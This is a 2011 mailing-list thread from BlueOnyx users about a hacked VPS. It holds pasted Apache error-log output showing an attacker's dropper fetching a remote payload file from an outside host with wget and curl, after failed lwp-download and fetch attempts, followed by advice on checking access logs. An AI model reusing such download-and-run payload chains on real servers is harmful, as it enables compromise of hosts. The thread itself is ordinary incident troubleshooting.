[BlueOnyx:08834] Re: vps hacked
Steffan
general at ziggo.nl
Fri Oct 14 03:41:53 -05 2011
YES it did
But dont see any problem
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:07:13 +0200] "GET
/robots.txt HTTP/1.1" 406 - "-" "-"
www.stabikon.com 220.181.125.72 - - [12/Oct/2011:00:12:59 +0200] "GET /
HTTP/1.1" 304 - "-" "Sogou web
spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] File does not
exist: /home/sites/www.stabikon.de/web/en/robots.txt
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable
variant: /usr/sausalito/ui/web/error/fileNotFound.html
-----Oorspronkelijk bericht-----
Van: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] Namens Ken - Precision Web
Hosting, Inc
Verzonden: donderdag 13 oktober 2011 17:40
Aan: BlueOnyx General Mailing List
Onderwerp: [BlueOnyx:08828] Re: vps hacked
----- Original Message -----
From: Steffan
To: blueonyx at blueonyx.it
Sent: Thursday, October 13, 2011 5:07 AM
Subject: [BlueOnyx:08816] vps hacked
I still have a client with a BlueQuartz server (vps)
This morning the virtual server was hacked
I looked in the logs and found this in /var/log/httpd/error_log
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable
variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100% 1015.53
KB/s
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
^M 14 28039 14 4097 0 0 98324 0 --:--:-- --:--:-- --:--:--
98324^M100 28039 100 28039 0 0 403k
0 --:--:-- --:--:-- --:--:-- 899k
sh: line 3: prv.txt: command not found
--00:07:40-- http://rapha.altervista.org/prv.txt
=> `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
0K .......... .......... ....... 100% 1020.34
KB/s
00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
^M 4 28039 4 1201 0 0 42493 0 --:--:-- --:--:-- --:--:--
42493^M100 28039 100 28039 0 0 507k
0 --:--:-- --:--:-- --:--:-- 1048k
sh: line 3: prv.txt: command not found
I don't see any admin logins
How can I find out what happened
I dont see anything weird in the access log or message log
Thanxs Steffan
<<
What if you
cat /var/log/httpd/access_log | grep 220.181.125.72
Is that IP address accessing any php scripts on your server?
Or look right before that snippet that you pasted.
----
Ken Marcus
Precision Web Hosting, Inc.
http://www.precisionweb.net
_______________________________________________
Blueonyx mailing list
Blueonyx at mail.blueonyx.it
http://mail.blueonyx.it/mailman/listinfo/blueonyx
More information about the Blueonyx
mailing list